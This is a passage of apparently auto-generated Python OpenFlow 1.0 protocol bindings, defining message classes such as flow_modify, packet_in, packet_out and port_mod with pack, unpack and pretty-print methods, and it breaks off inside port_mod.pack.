error_msg.subtypes[3] = flow_mod_failed_error_msg
class flow_modify(flow_mod):
version = 1
type = 14
_command = 1
def __init__(self, xid=None, match=None, cookie=None, idle_timeout=None, hard_timeout=None, priority=None, buffer_id=None, out_port=None, flags=None, actions=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if match != None:
self.match = match
else:
self.match = ofp.match()
if cookie != None:
self.cookie = cookie
else:
self.cookie = 0
if idle_timeout != None:
self.idle_timeout = idle_timeout
else:
self.idle_timeout = 0
if hard_timeout != None:
self.hard_timeout = hard_timeout
else:
self.hard_timeout = 0
if priority != None:
self.priority = priority
else:
self.priority = 0
if buffer_id != None:
self.buffer_id = buffer_id
else:
self.buffer_id = 0
if out_port != None:
self.out_port = out_port
else:
self.out_port = 0
if flags != None:
self.flags = flags
else:
self.flags = 0
if actions != None:
self.actions = actions
else:
self.actions = []
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(self.match.pack())
packed.append(struct.pack("!Q", self.cookie))
packed.append(util.pack_fm_cmd(self._command))
packed.append(struct.pack("!H", self.idle_timeout))
packed.append(struct.pack("!H", self.hard_timeout))
packed.append(struct.pack("!H", self.priority))
packed.append(struct.pack("!L", self.buffer_id))
packed.append(util.pack_port_no(self.out_port))
packed.append(struct.pack("!H", self.flags))
packed.append(loxi.generic_util.pack_list(self.actions))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = flow_modify()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 14)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
obj.match = ofp.match.unpack(reader)
obj.cookie = reader.read("!Q")[0]
__command = util.unpack_fm_cmd(reader)
assert(__command == 1)
obj.idle_timeout = reader.read("!H")[0]
obj.hard_timeout = reader.read("!H")[0]
obj.priority = reader.read("!H")[0]
obj.buffer_id = reader.read("!L")[0]
obj.out_port = util.unpack_port_no(reader)
obj.flags = reader.read("!H")[0]
obj.actions = loxi.generic_util.unpack_list(reader, ofp.action.action.unpack)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.match != other.match: return False
if self.cookie != other.cookie: return False
if self.idle_timeout != other.idle_timeout: return False
if self.hard_timeout != other.hard_timeout: return False
if self.priority != other.priority: return False
if self.buffer_id != other.buffer_id: return False
if self.out_port != other.out_port: return False
if self.flags != other.flags: return False
if self.actions != other.actions: return False
return True
def pretty_print(self, q):
q.text("flow_modify {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("match = ");
q.pp(self.match)
q.text(","); q.breakable()
q.text("cookie = ");
q.text("%#x" % self.cookie)
q.text(","); q.breakable()
q.text("idle_timeout = ");
q.text("%#x" % self.idle_timeout)
q.text(","); q.breakable()
q.text("hard_timeout = ");
q.text("%#x" % self.hard_timeout)
q.text(","); q.breakable()
q.text("priority = ");
q.text("%#x" % self.priority)
q.text(","); q.breakable()
q.text("buffer_id = ");
q.text("%#x" % self.buffer_id)
q.text(","); q.breakable()
q.text("out_port = ");
q.text(util.pretty_port(self.out_port))
q.text(","); q.breakable()
q.text("flags = ");
q.text("%#x" % self.flags)
q.text(","); q.breakable()
q.text("actions = ");
q.pp(self.actions)
q.breakable()
q.text('}')
flow_mod.subtypes[1] = flow_modify
class flow_modify_strict(flow_mod):
version = 1
type = 14
_command = 2
def __init__(self, xid=None, match=None, cookie=None, idle_timeout=None, hard_timeout=None, priority=None, buffer_id=None, out_port=None, flags=None, actions=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if match != None:
self.match = match
else:
self.match = ofp.match()
if cookie != None:
self.cookie = cookie
else:
self.cookie = 0
if idle_timeout != None:
self.idle_timeout = idle_timeout
else:
self.idle_timeout = 0
if hard_timeout != None:
self.hard_timeout = hard_timeout
else:
self.hard_timeout = 0
if priority != None:
self.priority = priority
else:
self.priority = 0
if buffer_id != None:
self.buffer_id = buffer_id
else:
self.buffer_id = 0
if out_port != None:
self.out_port = out_port
else:
self.out_port = 0
if flags != None:
self.flags = flags
else:
self.flags = 0
if actions != None:
self.actions = actions
else:
self.actions = []
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(self.match.pack())
packed.append(struct.pack("!Q", self.cookie))
packed.append(util.pack_fm_cmd(self._command))
packed.append(struct.pack("!H", self.idle_timeout))
packed.append(struct.pack("!H", self.hard_timeout))
packed.append(struct.pack("!H", self.priority))
packed.append(struct.pack("!L", self.buffer_id))
packed.append(util.pack_port_no(self.out_port))
packed.append(struct.pack("!H", self.flags))
packed.append(loxi.generic_util.pack_list(self.actions))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = flow_modify_strict()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 14)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
obj.match = ofp.match.unpack(reader)
obj.cookie = reader.read("!Q")[0]
__command = util.unpack_fm_cmd(reader)
assert(__command == 2)
obj.idle_timeout = reader.read("!H")[0]
obj.hard_timeout = reader.read("!H")[0]
obj.priority = reader.read("!H")[0]
obj.buffer_id = reader.read("!L")[0]
obj.out_port = util.unpack_port_no(reader)
obj.flags = reader.read("!H")[0]
obj.actions = loxi.generic_util.unpack_list(reader, ofp.action.action.unpack)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.match != other.match: return False
if self.cookie != other.cookie: return False
if self.idle_timeout != other.idle_timeout: return False
if self.hard_timeout != other.hard_timeout: return False
if self.priority != other.priority: return False
if self.buffer_id != other.buffer_id: return False
if self.out_port != other.out_port: return False
if self.flags != other.flags: return False
if self.actions != other.actions: return False
return True
def pretty_print(self, q):
q.text("flow_modify_strict {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("match = ");
q.pp(self.match)
q.text(","); q.breakable()
q.text("cookie = ");
q.text("%#x" % self.cookie)
q.text(","); q.breakable()
q.text("idle_timeout = ");
q.text("%#x" % self.idle_timeout)
q.text(","); q.breakable()
q.text("hard_timeout = ");
q.text("%#x" % self.hard_timeout)
q.text(","); q.breakable()
q.text("priority = ");
q.text("%#x" % self.priority)
q.text(","); q.breakable()
q.text("buffer_id = ");
q.text("%#x" % self.buffer_id)
q.text(","); q.breakable()
q.text("out_port = ");
q.text(util.pretty_port(self.out_port))
q.text(","); q.breakable()
q.text("flags = ");
q.text("%#x" % self.flags)
q.text(","); q.breakable()
q.text("actions = ");
q.pp(self.actions)
q.breakable()
q.text('}')
flow_mod.subtypes[2] = flow_modify_strict
class flow_removed(message):
version = 1
type = 11
def __init__(self, xid=None, match=None, cookie=None, priority=None, reason=None, duration_sec=None, duration_nsec=None, idle_timeout=None, packet_count=None, byte_count=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if match != None:
self.match = match
else:
self.match = ofp.match()
if cookie != None:
self.cookie = cookie
else:
self.cookie = 0
if priority != None:
self.priority = priority
else:
self.priority = 0
if reason != None:
self.reason = reason
else:
self.reason = 0
if duration_sec != None:
self.duration_sec = duration_sec
else:
self.duration_sec = 0
if duration_nsec != None:
self.duration_nsec = duration_nsec
else:
self.duration_nsec = 0
if idle_timeout != None:
self.idle_timeout = idle_timeout
else:
self.idle_timeout = 0
if packet_count != None:
self.packet_count = packet_count
else:
self.packet_count = 0
if byte_count != None:
self.byte_count = byte_count
else:
self.byte_count = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(self.match.pack())
packed.append(struct.pack("!Q", self.cookie))
packed.append(struct.pack("!H", self.priority))
packed.append(struct.pack("!B", self.reason))
packed.append('\x00' * 1)
packed.append(struct.pack("!L", self.duration_sec))
packed.append(struct.pack("!L", self.duration_nsec))
packed.append(struct.pack("!H", self.idle_timeout))
packed.append('\x00' * 2)
packed.append(struct.pack("!Q", self.packet_count))
packed.append(struct.pack("!Q", self.byte_count))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = flow_removed()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 11)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
obj.match = ofp.match.unpack(reader)
obj.cookie = reader.read("!Q")[0]
obj.priority = reader.read("!H")[0]
obj.reason = reader.read("!B")[0]
reader.skip(1)
obj.duration_sec = reader.read("!L")[0]
obj.duration_nsec = reader.read("!L")[0]
obj.idle_timeout = reader.read("!H")[0]
reader.skip(2)
obj.packet_count = reader.read("!Q")[0]
obj.byte_count = reader.read("!Q")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.match != other.match: return False
if self.cookie != other.cookie: return False
if self.priority != other.priority: return False
if self.reason != other.reason: return False
if self.duration_sec != other.duration_sec: return False
if self.duration_nsec != other.duration_nsec: return False
if self.idle_timeout != other.idle_timeout: return False
if self.packet_count != other.packet_count: return False
if self.byte_count != other.byte_count: return False
return True
def pretty_print(self, q):
q.text("flow_removed {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("match = ");
q.pp(self.match)
q.text(","); q.breakable()
q.text("cookie = ");
q.text("%#x" % self.cookie)
q.text(","); q.breakable()
q.text("priority = ");
q.text("%#x" % self.priority)
q.text(","); q.breakable()
q.text("reason = ");
q.text("%#x" % self.reason)
q.text(","); q.breakable()
q.text("duration_sec = ");
q.text("%#x" % self.duration_sec)
q.text(","); q.breakable()
q.text("duration_nsec = ");
q.text("%#x" % self.duration_nsec)
q.text(","); q.breakable()
q.text("idle_timeout = ");
q.text("%#x" % self.idle_timeout)
q.text(","); q.breakable()
q.text("packet_count = ");
q.text("%#x" % self.packet_count)
q.text(","); q.breakable()
q.text("byte_count = ");
q.text("%#x" % self.byte_count)
q.breakable()
q.text('}')
message.subtypes[11] = flow_removed
class flow_stats_reply(stats_reply):
version = 1
type = 17
stats_type = 1
def __init__(self, xid=None, flags=None, entries=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if flags != None:
self.flags = flags
else:
self.flags = 0
if entries != None:
self.entries = entries
else:
self.entries = []
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!H", self.stats_type))
packed.append(struct.pack("!H", self.flags))
packed.append(loxi.generic_util.pack_list(self.entries))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = flow_stats_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 17)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_stats_type = reader.read("!H")[0]
assert(_stats_type == 1)
obj.flags = reader.read("!H")[0]
obj.entries = loxi.generic_util.unpack_list(reader, ofp.common.flow_stats_entry.unpack)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.flags != other.flags: return False
if self.entries != other.entries: return False
return True
def pretty_print(self, q):
q.text("flow_stats_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("flags = ");
q.text("%#x" % self.flags)
q.text(","); q.breakable()
q.text("entries = ");
q.pp(self.entries)
q.breakable()
q.text('}')
stats_reply.subtypes[1] = flow_stats_reply
class flow_stats_request(stats_request):
version = 1
type = 16
stats_type = 1
def __init__(self, xid=None, flags=None, match=None, table_id=None, out_port=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if flags != None:
self.flags = flags
else:
self.flags = 0
if match != None:
self.match = match
else:
self.match = ofp.match()
if table_id != None:
self.table_id = table_id
else:
self.table_id = 0
if out_port != None:
self.out_port = out_port
else:
self.out_port = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!H", self.stats_type))
packed.append(struct.pack("!H", self.flags))
packed.append(self.match.pack())
packed.append(struct.pack("!B", self.table_id))
packed.append('\x00' * 1)
packed.append(util.pack_port_no(self.out_port))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = flow_stats_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 16)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_stats_type = reader.read("!H")[0]
assert(_stats_type == 1)
obj.flags = reader.read("!H")[0]
obj.match = ofp.match.unpack(reader)
obj.table_id = reader.read("!B")[0]
reader.skip(1)
obj.out_port = util.unpack_port_no(reader)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.flags != other.flags: return False
if self.match != other.match: return False
if self.table_id != other.table_id: return False
if self.out_port != other.out_port: return False
return True
def pretty_print(self, q):
q.text("flow_stats_request {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("flags = ");
q.text("%#x" % self.flags)
q.text(","); q.breakable()
q.text("match = ");
q.pp(self.match)
q.text(","); q.breakable()
q.text("table_id = ");
q.text("%#x" % self.table_id)
q.text(","); q.breakable()
q.text("out_port = ");
q.text(util.pretty_port(self.out_port))
q.breakable()
q.text('}')
stats_request.subtypes[1] = flow_stats_request
class get_config_reply(message):
version = 1
type = 8
def __init__(self, xid=None, flags=None, miss_send_len=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if flags != None:
self.flags = flags
else:
self.flags = 0
if miss_send_len != None:
self.miss_send_len = miss_send_len
else:
self.miss_send_len = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!H", self.flags))
packed.append(struct.pack("!H", self.miss_send_len))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = get_config_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 8)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
obj.flags = reader.read("!H")[0]
obj.miss_send_len = reader.read("!H")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.flags != other.flags: return False
if self.miss_send_len != other.miss_send_len: return False
return True
def pretty_print(self, q):
q.text("get_config_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("flags = ");
q.text("%#x" % self.flags)
q.text(","); q.breakable()
q.text("miss_send_len = ");
q.text("%#x" % self.miss_send_len)
q.breakable()
q.text('}')
message.subtypes[8] = get_config_reply
class get_config_request(message):
version = 1
type = 7
def __init__(self, xid=None):
if xid != None:
self.xid = xid
else:
self.xid = None
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = get_config_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 7)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
return True
def pretty_print(self, q):
q.text("get_config_request {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.breakable()
q.text('}')
message.subtypes[7] = get_config_request
class hello(message):
version = 1
type = 0
def __init__(self, xid=None):
if xid != None:
self.xid = xid
else:
self.xid = None
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = hello()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 0)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
return True
def pretty_print(self, q):
q.text("hello {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.breakable()
q.text('}')
message.subtypes[0] = hello
class hello_failed_error_msg(error_msg):
version = 1
type = 1
err_type = 0
def __init__(self, xid=None, code=None, data=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if code != None:
self.code = code
else:
self.code = 0
if data != None:
self.data = data
else:
self.data = ''
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!H", self.err_type))
packed.append(struct.pack("!H", self.code))
packed.append(self.data)
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = hello_failed_error_msg()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 1)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_err_type = reader.read("!H")[0]
assert(_err_type == 0)
obj.code = reader.read("!H")[0]
obj.data = str(reader.read_all())
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.code != other.code: return False
if self.data != other.data: return False
return True
def pretty_print(self, q):
q.text("hello_failed_error_msg {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("code = ");
q.text("%#x" % self.code)
q.text(","); q.breakable()
q.text("data = ");
q.pp(self.data)
q.breakable()
q.text('}')
error_msg.subtypes[0] = hello_failed_error_msg
class nicira_header(experimenter):
subtypes = {}
version = 1
type = 4
experimenter = 8992
def __init__(self, xid=None, subtype=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if subtype != None:
self.subtype = subtype
else:
self.subtype = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
subtype, = reader.peek('!L', 12)
subclass = nicira_header.subtypes.get(subtype)
if subclass:
return subclass.unpack(reader)
obj = nicira_header()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 8992)
obj.subtype = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.subtype != other.subtype: return False
return True
def pretty_print(self, q):
q.text("nicira_header {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.breakable()
q.text('}')
experimenter.subtypes[8992] = nicira_header
class nicira_controller_role_reply(nicira_header):
version = 1
type = 4
experimenter = 8992
subtype = 11
def __init__(self, xid=None, role=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if role != None:
self.role = role
else:
self.role = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!L", self.role))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = nicira_controller_role_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 8992)
_subtype = reader.read("!L")[0]
assert(_subtype == 11)
obj.role = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.role != other.role: return False
return True
def pretty_print(self, q):
q.text("nicira_controller_role_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("role = ");
q.text("%#x" % self.role)
q.breakable()
q.text('}')
nicira_header.subtypes[11] = nicira_controller_role_reply
class nicira_controller_role_request(nicira_header):
version = 1
type = 4
experimenter = 8992
subtype = 10
def __init__(self, xid=None, role=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if role != None:
self.role = role
else:
self.role = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!L", self.role))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = nicira_controller_role_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 8992)
_subtype = reader.read("!L")[0]
assert(_subtype == 10)
obj.role = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.role != other.role: return False
return True
def pretty_print(self, q):
q.text("nicira_controller_role_request {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("role = ");
q.text("%#x" % self.role)
q.breakable()
q.text('}')
nicira_header.subtypes[10] = nicira_controller_role_request
class packet_in(message):
version = 1
type = 10
def __init__(self, xid=None, buffer_id=None, total_len=None, in_port=None, reason=None, data=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if buffer_id != None:
self.buffer_id = buffer_id
else:
self.buffer_id = 0
if total_len != None:
self.total_len = total_len
else:
self.total_len = 0
if in_port != None:
self.in_port = in_port
else:
self.in_port = 0
if reason != None:
self.reason = reason
else:
self.reason = 0
if data != None:
self.data = data
else:
self.data = ''
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.buffer_id))
packed.append(struct.pack("!H", self.total_len))
packed.append(util.pack_port_no(self.in_port))
packed.append(struct.pack("!B", self.reason))
packed.append('\x00' * 1)
packed.append(self.data)
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = packet_in()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 10)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
obj.buffer_id = reader.read("!L")[0]
obj.total_len = reader.read("!H")[0]
obj.in_port = util.unpack_port_no(reader)
obj.reason = reader.read("!B")[0]
reader.skip(1)
obj.data = str(reader.read_all())
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.buffer_id != other.buffer_id: return False
if self.total_len != other.total_len: return False
if self.in_port != other.in_port: return False
if self.reason != other.reason: return False
if self.data != other.data: return False
return True
def pretty_print(self, q):
q.text("packet_in {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("buffer_id = ");
q.text("%#x" % self.buffer_id)
q.text(","); q.breakable()
q.text("total_len = ");
q.text("%#x" % self.total_len)
q.text(","); q.breakable()
q.text("in_port = ");
q.text(util.pretty_port(self.in_port))
q.text(","); q.breakable()
q.text("reason = ");
q.text("%#x" % self.reason)
q.text(","); q.breakable()
q.text("data = ");
q.pp(self.data)
q.breakable()
q.text('}')
message.subtypes[10] = packet_in
class packet_out(message):
version = 1
type = 13
def __init__(self, xid=None, buffer_id=None, in_port=None, actions=None, data=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if buffer_id != None:
self.buffer_id = buffer_id
else:
self.buffer_id = 0
if in_port != None:
self.in_port = in_port
else:
self.in_port = 0
if actions != None:
self.actions = actions
else:
self.actions = []
if data != None:
self.data = data
else:
self.data = ''
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.buffer_id))
packed.append(util.pack_port_no(self.in_port))
packed.append(struct.pack("!H", 0)) # placeholder for actions_len at index 6
packed.append(loxi.generic_util.pack_list(self.actions))
packed[6] = struct.pack("!H", len(packed[-1]))
packed.append(self.data)
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = packet_out()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 13)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
obj.buffer_id = reader.read("!L")[0]
obj.in_port = util.unpack_port_no(reader)
_actions_len = reader.read("!H")[0]
obj.actions = loxi.generic_util.unpack_list(reader.slice(_actions_len), ofp.action.action.unpack)
obj.data = str(reader.read_all())
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.buffer_id != other.buffer_id: return False
if self.in_port != other.in_port: return False
if self.actions != other.actions: return False
if self.data != other.data: return False
return True
def pretty_print(self, q):
q.text("packet_out {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("buffer_id = ");
q.text("%#x" % self.buffer_id)
q.text(","); q.breakable()
q.text("in_port = ");
q.text(util.pretty_port(self.in_port))
q.text(","); q.breakable()
q.text("actions = ");
q.pp(self.actions)
q.text(","); q.breakable()
q.text("data = ");
q.pp(self.data)
q.breakable()
q.text('}')
message.subtypes[13] = packet_out
class port_mod(message):
version = 1
type = 15
def __init__(self, xid=None, port_no=None, hw_addr=None, config=None, mask=None, advertise=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if port_no != None:
self.port_no = port_no
else:
self.port_no = 0
if hw_addr != None:
self.hw_addr = hw_addr
else:
self.hw_addr = [0,0,0,0,0,0]
if config != None:
self.config = config
else:
self.config = 0
if mask != None:
self.mask = mask
else:
self.mask = 0
if advertise != None:
self.advertise = advertise
else:
self.advertise = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(util.pack_port_no(self.port_no))
packed.append(struct.pack("!6B", *self.hw_addr))
packed.append(struct.pack("!L", self.config))
packed.append(struct.pack("!L", self.mask))
